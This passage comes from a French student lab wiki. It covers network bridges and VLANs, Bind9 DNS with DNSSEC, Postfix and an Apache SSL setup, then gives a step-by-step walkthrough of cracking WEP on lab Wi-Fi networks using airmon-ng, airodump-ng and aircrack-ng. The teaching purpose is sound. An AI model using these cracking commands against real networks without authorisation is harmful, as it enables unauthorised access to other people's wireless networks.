  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
